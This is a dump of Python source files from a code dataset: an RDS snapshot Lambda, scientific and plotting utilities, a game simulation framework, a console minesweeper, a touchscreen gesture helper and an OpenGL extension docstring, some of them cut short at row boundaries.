content
stringlengths 5
1.05M
|
|---|
# Creates manual snapshots of RDS Instances
import boto3
import datetime
import time
def lambda_handler(event, context):
#connecting to rds client interface
rds = boto3.client('rds')
#creates place holder for instances to be backed up
instances_to_backup = []
response = rds.describe_db_instances()
instances = response['DBInstances']
print("The total number of instances to be processed is %s " % len(instances))
for instance in instances:
engine = instance['Engine']
instances_to_backup.append(instance['DBInstanceIdentifier'])
print("This instance - %s has engine - %s " % (instance['DBInstanceIdentifier'], engine))
print("RDS snapshot backups stated at %s...\n" % datetime.datetime.now())
for bkup in instances_to_backup:
today = datetime.date.today()
rds.create_db_snapshot(
DBInstanceIdentifier = bkup,
DBSnapshotIdentifier = "{}-{:%Y-%m-%d}".format(bkup,today),
|
#!/usr/bin/python
## This uses ephemeral.
import optparse, os, shutil, sys, tempfile, glob, shlex, vcf, pysam, tarfile
from subprocess import *
import subprocess
CHUNK_SIZE = 2**20 #1mb
def cleanup_before_exit( tmp_dir ):
if tmp_dir and os.path.exists( tmp_dir ):
shutil.rmtree( tmp_dir )
def __main__():
parser = optparse.OptionParser()
parser.add_option('','--input', dest="inputF", action='store', type="string", default=None, help='')
parser.add_option('','--region', dest="regionF", action='store', type="string", default=None, help='')
parser.add_option( '', '--output', dest='outputF', action='store', type="string", default=None, help='')
##parser.add_option( '', '--out-dir', dest='output_dir', action='store', type="string", default=None, help='If specified, the output directory for extra files.' )
(options, args) = parser.parse_args()
ephemeral_dir = tempfile.mkdtemp(prefix="piq-")
if not os.path.exists(ephemeral_dir):
os.mkdir(ephemeral_dir)
input_dir = "%s/input" % ephemeral_dir
output_dir = "%s/output" % ephemeral_dir
config_dir = "%s/config" % ephemeral_dir
if not os.path.exists(output_dir):
os.mkdir(input_dir)
os.mkdir(output_dir)
os.mkdir(config_dir)
# region input file
linked_bed_name = "%s/regions.bed" % input_dir
if not os.path.exists(linked_bed_name):
os.symlink(options.regionF, linked_bed_name)
linked_bam_name="%s/sample.bam" % input_dir
if not os.path.exists(linked_bam_name):
os.symlink(options.inputF, linked_bam_name)
pysam.index(linked_bam_name)
input_config = open("%s/input.txt" % config_dir, 'w')
input_config.write("name\ttype\tfile\tdata\tgroup\n")
input_config.write("HS2\tregions\t%s\tHS\tDU_K562_HINT\n" % linked_bed_name)
input_config.write("DNase\treads\t%s\tDNASE\tDU_K562_HINT\n" % linked_bam_name)
input_config.close()
#hint_cmd = "rgt-hint --output-location %s/ %s/input.txt" % (output_dir, config_dir)
hint_cmd = "rgt-hint --output-location %s/ %s/input.txt" % (output_dir, config_dir)
print "hint cmd:%s" % hint_cmd
stdout = tempfile.NamedTemporaryFile( prefix="hint-stdout-", dir=ephemeral_dir)
stderr = tempfile.NamedTemporaryFile( prefix="hint-stderr-", dir=ephemeral_dir)
proc = subprocess.Popen( args=hint_cmd, stdout=stdout, stderr=stderr, shell=True, cwd=ephemeral_dir )
return_code = proc.wait()
if return_code:
stderr_target = sys.stderr
else:
stderr_target = sys.stdout
stderr.flush()
stderr.seek(0)
while True:
chunk = stderr.read( CHUNK_SIZE )
if chunk:
stderr_target.write( chunk )
else:
break
stderr.close()
stdout.close()
# copy files to final output locations
shutil.copy('%s/DU_K562_HINT.bed' % output_dir, options.outputF)
if __name__=="__main__": __main__()
|
from collections import OrderedDict
import logging
import os
import shutil
import subprocess
import simtk.unit as units
from intermol.desmond.desmond_parser import load, save
DES_PATH = ''
logger = logging.getLogger('InterMolLog')
# terms we are ignoring for now.
#'en': 'Raw Potential',
#'E_x': 'Extended En.',
unwanted = ['E_x','E_n','E_k','constraints',]
key_dict = {
'E_p': 'Potential',
'stretch': 'Bond',
'angle': 'Angle',
'dihedral': 'All dihedrals',
'pair_vdw': 'LJ-14',
'pair_elec': 'Coulomb-14',
'nonbonded_vdw': 'LJ (SR)',
}
def standardize_key(in_key):
if in_key in key_dict:
out_key = key_dict[in_key]
else:
out_key = in_key
return out_key
def get_desmond_energy_from_file(energy_file):
"""Parses the desmond energy file. """
with open(energy_file, 'r') as f:
data = []
types = []
# First line of enegrp.dat file contains total energy terms.
line = f.readline()
# Just to make sure the line is what we think it is.
if line.startswith('time=0.000000'):
terms = line.split()
terms = terms[1:-2] # Exclude time, pressure, and volume.
for term in terms:
key, value = term.split('=')
types.append(standardize_key(key))
data.append(float(value))
# Parse rest of file for individual energy grouops.
for line in f:
if '(0.000000)' in line: # Time = 0.0
words = line.split()
if words[-1] == 'total':
continue
key = standardize_key(words[0])
if key:
types.append(key)
data.append(words[-1])
data = [float(value) * units.kilocalories_per_mole for value in data]
e_out = OrderedDict(zip(types, data))
# Discard non-energy terms.
for group in unwanted:
if group in e_out:
del e_out[group]
return e_out
def energies(cms, cfg, des_path):
"""Evalutes energies of DESMOND files
Args:
cms (str): Path to .cms file.
cfg (str): Path to .cfg file.
des_path (str): Path to DESMOND binaries.
Returns:
tot_energy:
energy_file:
"""
logger.info('Evaluating energy of {0}'.format(cms))
cms = os.path.abspath(cms)
cfg = os.path.abspath(cfg)
direc, cms_filename = os.path.split(cms)
cwd = os.getcwd()
name = os.path.splitext(cms_filename)[0]
energy_file = '%s/%s.enegrp.dat' % (direc, name)
if des_path and not (des_path == ''):
desmond_bin = os.path.join(des_path,'desmond')
elif os.environ.get('SCHRODINGER'):
desmond_bin = os.path.join(os.environ.get('SCHRODINGER'), 'desmond')
else:
raise Exception('Desmond binary not found')
# Use DESMOND To evaluate energy
# cd to directory of cms file so that files generated by desmond
# don't clog the working directory
os.chdir(direc)
if os.path.exists('trj'):
shutil.rmtree('trj')
cmd = [desmond_bin, '-WAIT', '-P', '1', '-in', cms, '-JOBNAME', name, '-c', cfg]
logger.debug('Running DESMOND with command:\n %s' % ' '.join(cmd))
with open('desmond_stdout.txt', 'w') as out, open('desmond_stderr.txt', 'w') as err:
exit = subprocess.call(cmd, stdout=out, stderr=err)
if exit:
logger.error('Energy evaluation failed. See %s/desmond_stderr.txt' % direc)
os.chdir(cwd) # return directory up a level again
raise Exception('Energy evaluation failed for {0}'.format(cms))
tot_energy = get_desmond_energy_from_file(energy_file)
# for now, remove the desmond '-out.cms' file.
outcms = cms[:-4] + '-out' + cms[-4:]
os.remove(outcms)
os.chdir(cwd) # return directory up a level again
return tot_energy, energy_file
|
import networkx as nx
from omlt.neuralnet.layer import Layer
class NetworkDefinition:
def __init__(self, scaling_object=None, scaled_input_bounds=None):
"""
Create a network definition object used to create the neural network
formulation in Pyomo
Args:
scaling_object : ScalingInterface or None
A scaling object to specify the scaling parameters for the
neural network inputs and outputs. If None, then no
scaling is performed.
scaled_input_bounds : dict or None
A dict that contains the bounds on the scaled variables (the
direct inputs to the neural network). If None, then no bounds
are specified.
"""
self.__layers_by_id = dict()
self.__graph = nx.DiGraph()
self.__scaling_object = scaling_object
self.__scaled_input_bounds = scaled_input_bounds
def add_layer(self, layer):
"""
Add a layer to the network.
Parameters
----------
layer : Layer
the layer to add to the network
"""
layer_id = id(layer)
self.__layers_by_id[layer_id] = layer
self.__graph.add_node(layer_id)
def add_edge(self, from_layer, to_layer):
"""
Add an edge between two layers.
Parameters
----------
from_layer : Layer
the layer with the outbound connection
to_layer : Layer
the layer with the inbound connection
"""
id_to = id(to_layer)
id_from = id(from_layer)
assert id_to in self.__layers_by_id
assert id_from in self.__layers_by_id
self.__graph.add_edge(id_from, id_to)
@property
def scaling_object(self):
"""Return an instance of the scaling object that supports the ScalingInterface"""
return self.__scaling_object
@property
def scaled_input_bounds(self):
"""Return a dict of tuples containing lower and upper bounds of neural network inputs"""
return self.__scaled_input_bounds
@property
def input_layers(self):
"""Return an iterator over the input layers"""
for layer_id, in_degree in self.__graph.in_degree():
if in_degree == 0:
yield self.__layers_by_id[layer_id]
@property
def input_nodes(self):
"""An alias for input_layers"""
return self.input_layers
@property
def output_layers(self):
"""Return an iterator over the output layer"""
for layer_id, out_degree in self.__graph.out_degree():
if out_degree == 0:
yield self.__layers_by_id[layer_id]
@property
def output_nodes(self):
"""An alias for output_layers"""
return self.output_layers
def layer(self, layer_id):
"""Return the layer with the given id"""
return self.__layers_by_id[layer_id]
@property
def layers(self):
"""Return an iterator over all the layers"""
for layer_id in nx.topological_sort(self.__graph):
yield self.__layers_by_id[layer_id]
def predecessors(self, layer):
"""Return an iterator over the layers with outbound connections into the layer"""
if isinstance(layer, Layer):
layer = id(layer)
for node_id in self.__graph.predecessors(layer):
yield self.__layers_by_id[node_id]
def successors(self, layer):
"""Return an iterator over the layers with an inbound connection from the layer"""
if isinstance(layer, Layer):
layer = id(layer)
for node_id in self.__graph.successors(layer):
yield self.__layers_by_id[node_id]
def __str__(self):
return f"NetworkDefinition(num_layers={len(self.__layers_by_id)})"
|
#!/usr/bin/env python3
import sys, os, json, csv
from math import log
import matplotlib.pyplot as plt
import numpy as np
from scipy.interpolate import make_interp_spline, BSpline
# CREDITS
# Interpolation based upon: https://stackoverflow.com/questions/5283649/plot-smooth-line-with-pyplot
# Logarithmic scale: https://stackoverflow.com/questions/3242382/interpolation-over-an-irregular-grid
def compress_median(sub_list):
y_list = []
for point in sub_list:
y_list.append(point[1])
y_list.sort()
for point in sub_list:
if point[1] == y_list[int((len(y_list)-1)/2)]:
return point
def compress_max(sub_list):
y_list = []
for point in sub_list:
y_list.append(point[1])
y_list.sort()
for point in sub_list:
if point[1] == y_list[len(y_list)-1]:
return point
def bins_sort(dataset, dtype, config_file): # try not to reuse global names within functions to avoid possible confusions
config = {}
with open(config_file, "r") as f:
config = json.load(f)
bins = [] # new cycle, creating bins
if config["x_limits_data"]:
graph_range = int(log(config["x_max_data"], 10) - log(config["x_min_data"], 10)) # getting graph range
else:
graph_range = 8 # x-axis (logarithmic) - from 0 to 10^8
if dtype == config['data']['floor']['file_name']: # adjusting graph range to match # bins according to data type
cpd = config["count_per_decade_floor"]
compress_floor_bool = True
else:
cpd = config["count_per_decade"]
compress_floor_bool = False
graph_range = graph_range*cpd
for i in range(graph_range): # creating a bin per unit in range
bins.append([])
for point in dataset: # filling the bins up
try:
if point is None: # let's avoid execptions if possible! But how did that None happened in the first place?
continue # exeptions is the last resort when you DON'T KNOW what's wrong
# or the code that throws it is not yours to fix
if config["x_limits_data"]:
index = int(cpd*(log(point[0], 10) - log(config["x_min_data"], 10)))
else:
index = int(cpd*log(point[0], 10))
if 0 <= index and len(bins) > index: # let's avoid execptions if possible!
bins[index].append(point)
except (TypeError, IndexError):
print("!!!", dtype, point); exit()
pass # here we throw some data out without knowing what or why was that
result = []
for binn in bins:
if compress_floor_bool:
#result.append(compress_max(binn))
result.append(compress_median(binn))
else:
result.append(compress_median(binn))
return result
def main_plotter(config_file): # all data processing and plotting for one configuration file
main_path = os.path.realpath(__file__)
config = {}
with open(config_file, "r") as f:
config = json.load(f)
keys = []
for dtype in config["data"]:
keys.append(dtype)
g_data = {} # global data array
cal_dir = os.path.join(os.path.split(main_path)[0], config['cal_dir'])
g_data['cal'] = []
for file in os.listdir(cal_dir):
with open(os.path.join(cal_dir, file)) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
line_count = 0
for line in csv_reader:
if 0 < line_count:
g_data['cal'].append([float(line[0]), float(line[1])])
line_count+=1
all_dir = os.path.join(os.path.split(main_path)[0], config['main_dir'])
for dtype in keys:
g_data[dtype] = []
file_base_name = config['data'][dtype]['file_name']
files = []
for file in os.listdir(all_dir):
if file_base_name in file: # FAILING
files.append(file)
for file in files:
with open(os.path.join(all_dir, file)) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
line_count = 0
for line in csv_reader:
if 0 < line_count:
g_data[dtype].append([float(line[0]), float(line[1])])
line_count+=1
for key in keys: # sort data type list by the x values
g_data[key].sort()
# print(g_data[keys[1]]) # debug only
if g_data['cal'] == []:
print("No calibrational files found, please make sure they are in the same directory")
quit()
for key in range(len(keys)): # calibrate
for line in range(len(g_data[keys[key]])):
g_data[keys[key]][line][1] = g_data[keys[key]][line][1] - g_data['cal'][line][1]
# print(keys)
if config["compressed"]:
for dtype in range(len(keys)): # cycle through data types
result = bins_sort(g_data[keys[dtype]], config['data'][keys[dtype]]['file_name'], config_file)
g_data[keys[dtype]] = result
if config["inverted"]:
for dtype in range(len(keys)):
for line in range(len(g_data[keys[dtype]])):
try:
g_data[keys[dtype]][line][1] = -g_data[keys[dtype]][line][1]
except TypeError:
pass
fig = plt.figure(figsize=config["size"])
plot = fig.add_subplot()
for dtype in range(len(keys)):
npi = int(config["size"][0] * 100 / 4) # number of points for interpolation ~~ less than 4 pixels per point
if config["data"][keys[dtype]]["show"]:
x = []
y = []
for line in g_data[keys[dtype]]:
try:
x.append(line[0])
y.append(line[1])
except:
pass
if config["interpolation"]:
xn = np.array(x)
yn = np.array(y)
logxn = np.log10(xn)
logxnew = np.linspace(logxn.min(), logxn.max(), npi)
xnew = np.power(10.0, logxnew)
spl = make_interp_spline(xn, yn, k=3) # type: BSpline
ynew = spl(xnew)
plot.plot(xnew, ynew, config["data"][keys[dtype]]["color"], label=config["data"][keys[dtype]]["name"])
else:
plot.plot(x, y, config["data"][keys[dtype]]["color"], label=config["data"][keys[dtype]]["name"])
plot.set_xlabel(config["x_name"])
plot.set_ylabel(config["y_name"])
plt.title(config["title"])
if config["x_limits_graph"]:
plt.xlim([config["x_min_graph"], config["x_max_graph"]])
if config["y_limits"]:
plt.ylim([config["y_min"], config["y_max"]])
plt.xscale('log')
plt.minorticks_on()
plt.grid(True, which="major", color="grey")
plt.grid(True, which="minor", axis='both', color="gainsboro")
plt.legend(loc="lower right")
name = config["title"].replace(" ", "_")
plt.savefig(f'{name}.png')
if config["interactive"]:
plt.show()
if __name__ == "__main__":
args = sys.argv
if len(args) == 1:
main_plotter("config.json")
else:
for i in range(1, len(args)):
main_plotter(args[i])
|
#!/usr/bin/env python3
#******************************************************************************
# (C) 2018, Stefan Korner, Austria *
# *
# The Space Python Library is free software; you can redistribute it and/or *
# modify it under under the terms of the MIT License as published by the *
# Massachusetts Institute of Technology. *
# *
# The Space Python Library is distributed in the hope that it will be useful, *
# but WITHOUT ANY WARRANTY; without even the implied warranty of *
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the MIT License *
# for more details. *
#******************************************************************************
# Unit Tests *
#******************************************************************************
import os, sys
from UTIL.SYS import Error, LOG, LOG_INFO, LOG_WARNING, LOG_ERROR
import UTIL.SYS, UTIL.TASK, UTIL.TCP
#############
# functions #
#############
# -----------------------------------------------------------------------------
def initConfiguration():
"""initialise the system configuration"""
UTIL.SYS.s_configuration.setDefaults([
["HOST", "127.0.0.1"],
["SERVER_PORT", "1234"]])
# -----------------------------------------------------------------------------
def createClient():
"""create the TCP client"""
client = UTIL.TCP.Client(UTIL.TASK.s_processingTask)
if not client.connectToServer(
UTIL.SYS.s_configuration.HOST,
int(UTIL.SYS.s_configuration.SERVER_PORT)):
sys.exit(-1)
return client
########
# main #
########
if __name__ == "__main__":
# initialise the system configuration
initConfiguration()
# initialise the console handler
consoleHandler = UTIL.TASK.ConsoleHandler()
# initialise the model
modelTask = UTIL.TASK.ProcessingTask(isParent=True)
# register the console handler
modelTask.registerConsoleHandler(consoleHandler)
# create the TCP client
LOG("Open the TCP client")
client = createClient()
# force termination of the server
LOG("force server termination...")
client.send("quit\n".encode())
|
# Copyright (C) 2020 Electronic Arts Inc. All rights reserved.
import pandas
class GameHistoryEntry:
def __init__(self, tick, state, player_identity_list, player_policy_list, player_action_list,
player_value_estimate_list, player_reward_list):
self.tick = tick
self.state = state
self.player_identity_list = player_identity_list
self.player_policy_list = player_policy_list
self.player_action_list = player_action_list
self.player_reward_list = player_reward_list
self.player_value_estimate_list = player_value_estimate_list
def Show(self):
print('tick:', self.tick, 'state:', self.state, 'identity:', self.player_identity_list,
'policy:', self.player_policy_list, 'action:', self.player_action_list, 'reward:',
self.player_reward_list, 'value:', self.player_value_estimate_list)
class GameEvent:
def __init__(self, tick, event_type, source_player_name, target_player_name):
self.tick = tick
self.event_type = event_type
self.source_player_name = source_player_name
self.target_player_name = target_player_name
class GameEventHistory:
def __init__(self):
self.event_list = []
def AddEvent(self, e):
self.event_list.append(e)
def EventMatches(self, e, event_type=None, min_tick=None, max_tick=None,
source_player_name=None, target_player_name=None):
if event_type is not None and e.event_type != event_type:
return False
if min_tick is not None and e.tick < min_tick:
return False
if max_tick is not None and e.tick > max_tick:
return False
if source_player_name is not None and e.source_player_name != source_player_name:
return False
if target_player_name is not None and e.target_player_name != target_player_name:
return False
return True
def FindEvents(self, event_type=None, min_tick=None, max_tick=None, source_player_name=None,
target_player_name=None):
l = []
for e in self.event_list:
if self.EventMatches(e, event_type, min_tick, max_tick, source_player_name,
target_player_name):
l.append(e)
return l
def FindMostRecentEvent(self, event_type=None, min_tick=None, max_tick=None,
source_player_name=None, target_player_name=None):
for e in self.event_list[-1::-1]:
if self.EventMatches(e, event_type, min_tick, max_tick, source_player_name,
target_player_name):
return e
return None
def EventListToDataFrame(self, l=None):
if l is None:
l = self.event_list
df = pandas.DataFrame(columns=['tick', 'event_type', 'source_player', 'target_player'])
i = 0
for e in l:
df.loc[i, 'tick'] = e.tick
df.loc[i, 'event_type'] = e.event_type
df.loc[i, 'source_player'] = e.source_player_name
df.loc[i, 'target_player'] = e.target_player_name
i += 1
return df
class Simulation:
NUM_AGENTS_INVOLVED = 0 # must override in derived class
WIN_REWARD = 1.0
LOSS_REWARD = -1.0
def __init__(self, players, verbosity=0):
self.players = players
self.verbosity = max(0, verbosity)
self.tick = 0
self.player_identity_list = [None] * len(players) # subclass should fill
self.game_state_history = []
self.game_state_vector = None
self._WipePlayerActionsAndRewardsForThisTick()
self.game_event_history = GameEventHistory()
def update(self, record_game_state=True):
if self.verbosity > 1:
self.ShowState()
self._WipePlayerActionsAndRewardsForThisTick()
self.CustomTick()
if record_game_state:
self._AddGameStateHistoryForThisTick()
self.tick += 1
def Simulate(self):
# this method need not be overridden and can be called from a different context if needed
if self.verbosity:
print('Simulation.Simulate() verbosity', self.verbosity)
while not self.IsSimulationComplete():
self.update()
if self.verbosity:
self.ShowState()
def _WipePlayerActionsAndRewardsForThisTick(self):
self.player_action_list = [None] * len(self.players)
self.player_reward_list = [0.0] * len(self.players)
self.player_policy_list = [None] * len(self.players)
self.player_value_estimate_list = [0.0] * len(self.players)
def _AddGameStateHistoryForThisTick(self):
h = GameHistoryEntry(self.tick, self.GetHashableGameStateVector(),
self.player_identity_list, self.player_policy_list,
self.player_action_list, self.player_value_estimate_list,
self.player_reward_list)
self.game_state_history.append(h)
def CustomTick(self):
# override this method with simulation specific logic
pass
def IsSimulationComplete(self):
# should return true if simulation is complete
raise NotImplementedError
def ShowState(self):
# helper method for debugging
raise NotImplementedError
def GetHashableGameStateVector(self):
# should return game state *from before this tick*
# *must be hashable for easy table generation, etc, best way is to convert to tuple*
raise NotImplementedError
|
'''
minesweeper in the console... works pretty ok
'''
import numpy as np
from timeit import default_timer
class Minesweeper:
"""class represents the game & associated metadata"""
def __init__(self, rows=10, cols=8, mines=None):
self.rows = rows
self.cols = cols
# board is rows * cols; game state is stored in self._state[0:4] as ndarray
# also aliased as self.mines, etc. for convenience
self._state = np.zeros((4, rows, cols), dtype='uint8')
self.mines = self._state[0]
self.counts = self._state[1]
self.viewed = self._state[2]
self.flags = self._state[3]
if mines is None:
self.mine_qty = rows * cols // 8
else:
assert isinstance(mines, int)
self.mine_qty = mines
mines_on_board = 0
# place mines on board at random
while mines_on_board < self.mine_qty:
y = np.random.randint(0, rows)
x = np.random.randint(0, cols)
if self.mines[y, x] == 0:
self.mines[y, x] = 1
mines_on_board += 1
# build counts (numbers that show on each square when viewed)
for row in range(rows):
for col in range(cols):
if not self.mines[row, col]:
self.counts[row, col] = self.count_mines(row, col)
# otherwise zero
self.start_time = default_timer()
self.play()
def show_board(self):
"""print board to console, does not affect game state"""
print('timer running: {:.0f} seconds'.format(default_timer() - self.start_time))
print('board: mines={} used_flags={}'.format(self.mine_qty, np.sum(self.flags)))
print()
print('* ' + ' '.join([str(i) for i in range(self.cols)]) + ' *')
for row in range(self.rows):
current_row = []
for col in range(self.cols):
# if flagged, show flag
if self.flags[row, col]:
current_row.append('x')
# if checked, show count
elif self.viewed[row, col]:
count = self.counts[row, col]
if count:
current_row.append(str(count))
else:
current_row.append('.')
# otherwise blank
else:
current_row.append(' ')
# print row#, assembled row, border
print(' '.join([str(row)] + current_row + ['*']))
# border
print('* ' * (self.cols + 2))
def probe(self, row, col):
"""test point (row, col); return True if game continues, else False"""
if not self.valid_loc(row, col):
print('invalid location')
return True
if self.viewed[row, col] == 1:
print('repeat move is invalid')
return True
# for valid moves, mark point as viewed:
self.viewed[row, col] = 1
# if rol, col is a mine
if self.mines[row, col]:
print('you lose!')
return False
# if counts == 0: safe square, expand it recursively
if self.counts[row, col] == 0:
for i in [-1, 0, 1]:
for j in [-1, 0, 1]:
new_col = col + i
new_row = row + j
if self.valid_loc(new_row, new_col) and not self.viewed[new_row, new_col]:
self.probe(new_row, new_col)
return True
def valid_loc(self, row, col):
return (0 <= col < self.cols) and (0 <= row < self.rows)
def count_mines(self, row, col):
"""count mines in squares adjacent to (row, col)"""
count = 0
for i in [-1, 0, 1]:
for j in [-1, 0, 1]:
if i == j == 0:
continue
# print(count)
# print(x + i, y + j)
# print(self.board[x + i, y + j])
new_row, new_col = row + i, col + j
if self.valid_loc(new_row, new_col):
count += self.mines[new_row, new_col]
return count
def play(self):
"""get player input and change game state"""
game_on = True # whether game continues
win = False
while game_on:
self.show_board()
print('Enter coordinate for next move:')
c = input('x_coordinate 0-{}: '.format(self.cols - 1))
r = input('y_coordinate 0-{}: '.format(self.rows - 1))
try:
r = int(r)
c = int(c)
except ValueError:
print('\n' * 8)
input('no, use numbers fool')
continue
# get move type
print('''
Select move, then press enter.
probe <blank>
flag move_type
back b
''')
move_type = input()
if move_type.lower() in ['f,' 'flag', '.']:
self.flags[r, c] = 1 - self.flags[r, c]
elif move_type.lower() in ['b', 'back']:
continue
else:
game_on = self.probe(r, c)
if np.array_equal(self.flags, self.mines):
win = True
break
if np.array_equal(self.viewed, np.ones((self.rows, self.cols), 'uint8') - self.mines):
win = True
break
else:
continue
if win:
print('you won eh')
print()
print(' ####### ')
print(' ## ## ')
print(' |[o] [o]| ')
print(' | A | ')
print(' \ === / ')
print(' ---- ')
else:
print('*wanh wah wah you are dead*')
print(' ______ ')
print(' / \ ')
print(' | x x |')
print(' | n |')
print(' \ / ')
print(' ==== ')
print(' \__/ ')
print()
print('game over eh')
print()
replay = input('press enter to replay...')
if 'n' in replay.lower():
return None
self.__init__()
if __name__ == '__main__':
m = Minesweeper()
|
import fastf1 as ff1
import matplotlib.pyplot as plt
from matplotlib.collections import LineCollection
from matplotlib import cm
import numpy as np
ff1.Cache.enable_cache('../doc_cache') # replace with your cache directory
session = ff1.get_session(2021, 'Austrian Grand Prix', 'Q')
laps = session.load_laps(with_telemetry=True)
lap = laps.pick_fastest()
tel = lap.get_telemetry()
|
"""
Python Script for adding 1 & 2 finger multitouch gestures to implement
a right click option with Touchscreens in the Ubuntu unity environment.
This is implemented with the evdev Python library on an ELAN touchscreen.
Currently implements 2 types of right click options:
1 finger long touch: Timeout of 1.5 seconds, movement cancels action
2 finger tap: movement cancels action
"""
from evdev import InputDevice, ecodes, UInput, list_devices
from pymouse import PyMouse
from threading import Timer
import subprocess
import argparse
class TrackedEvent(object):
"""
Class for multitouch event tracking.
Track position, movement, slots used (total number of fingers in gesture),
timing of long presses, and event completion.
"""
def __init__(self, dev, abilities, var_x, var_y,
use_pymouse=False, long_press_workaround=False):
""" Initialize tracking attributes. """
self.dev = dev
self.abilities = abilities
self.long_press_workaround = long_press_workaround
self.vars = {'ABS_X': var_x, 'ABS_Y': var_y}
self.position = {'ABS_X': None, 'ABS_Y': None}
self.fingers = 0
self.total_event_fingers = 0
self.discard = 0
self.moved = 0
self.track_start = None
self.click_delay = 1.5
self.long_pressed = False
if use_pymouse:
self.mouse = PyMouse()
else:
self.mouse = None
def add_finger(self):
""" Add a detected finger. """
self.fingers += 1
self.total_event_fingers = self.fingers
def remove_fingers(self):
""" Remove detected finger upon release. """
if self.fingers == 1:
print('Total Fingers used: ', self.total_event_fingers)
self.fingers -= 1
if (self.fingers == 0 and
self.total_event_fingers == 2 and
self.moved == 0):
self.total_event_fingers = 0
self._initiate_right_click()
elif (self.fingers == 0 and
self.total_event_fingers == 1 and
self.moved == 0):
self.total_event_fingers = 0
try:
self.track_start.cancel()
self.track_start.join()
except AttributeError: # capture Nonetype track_start
pass
if self.long_pressed and not self.long_press_workaround:
self._initiate_right_click()
if self.fingers == 0:
self.discard = 1
def position_event(self, event_code, value):
""" tracks position to track movement of fingers """
if self.position[event_code] is None:
self.position[event_code] = value
else:
if abs(self.position[event_code] - value) > self.vars[event_code]:
self._moved_event()
if (self.fingers == 1 and self.position['ABS_X'] and
self.position['ABS_Y'] and self.track_start is None):
self._trackit()
def _trackit(self):
""" start timing for long press """
self.track_start = Timer(self.click_delay, self._long_press)
self.track_start.start()
print('tracking started!!!')
def _long_press(self):
if self.fingers == 1 and self.moved == 0:
self.long_pressed = True
if self.long_press_workaround:
subprocess.call(['xinput', '--disable', self.dev.name])
subprocess.call(['xinput', '--enable', self.dev.name])
self._initiate_right_click()
def _moved_event(self):
""" movement detected. """
self.moved = 1
def _initiate_right_click(self):
""" Internal method for initiating a right click at touch point. """
if self.mouse is None:
with UInput(self.abilities) as ui:
ui.write(ecodes.EV_ABS, ecodes.ABS_X, 0)
ui.write(ecodes.EV_ABS, ecodes.ABS_Y, 0)
ui.write(ecodes.EV_KEY, ecodes.BTN_RIGHT, 1)
ui.write(ecodes.EV_KEY, ecodes.BTN_RIGHT, 0)
ui.syn()
else:
x, y = self.mouse.position()
self.mouse.click(x, y, 2)
def initiate_gesture_find(use_pymouse=False, long_press_workaround=False):
"""
This function will scan all input devices until it finds an
ELAN touchscreen. It will then enter a loop to monitor this device
without blocking its usage by the system.
"""
for device in list_devices():
dev = InputDevice(device)
if (dev.name == 'ELAN Touchscreen') or \
(dev.name == 'Atmel Atmel maXTouch Digitizer'):
break
Abs_events = {}
abilities = {ecodes.EV_ABS: [ecodes.ABS_X, ecodes.ABS_Y],
ecodes.EV_KEY: (ecodes.BTN_LEFT, ecodes.BTN_RIGHT,
ecodes.BTN_TOUCH)}
# Assuming QHD screen on my Yoga 2 Pro as default for resolution measures
res_x = 13 # touch unit resolution # units/mm in x direction
res_y = 13 # touch unit resolution # units/mm in y direction
# would be weird if above resolutions differed, but will treat generically
codes = dev.capabilities()
for code in codes:
if code == 3:
for type_code in codes[code]:
human_code = ecodes.ABS[type_code[0]]
if human_code == 'ABS_X':
vals = type_code[1]
abilities[ecodes.EV_ABS][0] = (ecodes.ABS_X, vals)
res_x = vals[-1]
elif human_code == 'ABS_Y':
vals = type_code[1]
abilities[ecodes.EV_ABS][1] = (ecodes.ABS_Y, vals)
res_y = vals[-1]
Abs_events[type_code[0]] = human_code
# Average index finger width is 16-20 mm, assume 20 mm
# touch resolution noise assumed at 10% (5% radius), so 1.0 mm by default
# this seemed resonable from my own trial tests
var_x = 1.0 * res_x # variablity in movement allowed in x direction
var_y = 1.0 * res_y # variablity in movement allowed in y direction
MT_event = None
for event in dev.read_loop():
if event.type == ecodes.EV_ABS:
if MT_event is None:
MT_event = TrackedEvent(dev, abilities, var_x, var_y,
use_pymouse, long_press_workaround)
event_code = Abs_events[event.code]
if event_code == 'ABS_X' or event_code == 'ABS_Y':
MT_event.position_event(event_code, event.value)
elif event_code == 'ABS_MT_TRACKING_ID':
if event.value == -1:
MT_event.remove_fingers()
if MT_event.discard == 1:
MT_event = None
else:
MT_event.add_finger()
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='Implements right click options on Linux Systems via Touchscreen')
parser.add_argument(
"--use_pymouse",
help="Uses PyMouse for initiating clicks instead of UInput",
action="store_true")
parser.add_argument(
"--long_press_workaround",
help="Uses xinupt to disable/enable touchscreen to raise context menu during press",
action="store_true")
args = parser.parse_args()
initiate_gesture_find(args.use_pymouse, args.long_press_workaround)
|
'''OpenGL extension AMD.compressed_3DC_texture
This module customises the behaviour of the
OpenGL.raw.GLES2.AMD.compressed_3DC_texture to provide a more
Python-friendly API
Overview (from the spec)
Two compression formats are introduced:
- A compression format for two component textures. When used to store
normal vectors, the two components are commonly used with a fragment
shader that derives the third component.
- A compression format for single component textures. The single component
may be used as a luminance or an alpha value.
There are a large number of games that use luminance only and/or alpha only
textures. For example, monochrome light maps used in a few popular games
are 8-bit luminance textures. This extension describes a compression format
that provides a 2:1 compression ratio for 8-bit single channel textures.
Normal maps are special textures that are used to add detail to 3D surfaces.
They are an extension of earlier "bump map" textures, which contained per-
pixel height values and were used to create the appearance of bumpiness on
otherwise smooth surfaces. Normal maps contain more detailed surface
information, allowing them to represent much more complex shapes.
Normal mapping is one of the key features that makes the current generation
of games look so much better than earlier titles. A limitation to the
effectiveness of this technique is the size of the textures required. In an
ideal case where every surface has both a color texture map and a normal
texture map, the texture memory and bandwidth requirements would double
compared to using color maps alone.
In fact, the problem is much worse because existing block based compression
methods such as DXTc, ETC, and S3TC are ineffective at compressing normal
maps. They tend to have trouble capturing the small edges and subtle
curvature that normal maps are designed to capture, and they also introduce
unsightly block artifacts.
Because normal maps are used to capture light reflections and realistic
surface highlights, these problems are amplified relative to their impact on
color textures. The results are sufficiently poor that game artists and
developers would rather not use normal map compression at all on most
surfaces, and instead limit themselves to lower resolution maps on selected
parts of the rendered scene.
3DC provides an ideal solution to the normal map compression problem. It
provides up to 4:1 compression of normal maps, with image quality that is
virtually indistinguishable from the uncompressed version. The technique is
hardware accelerated, so the performance impact is minimal. Thus,
developers are freed to use higher resolution, more detailed normal maps,
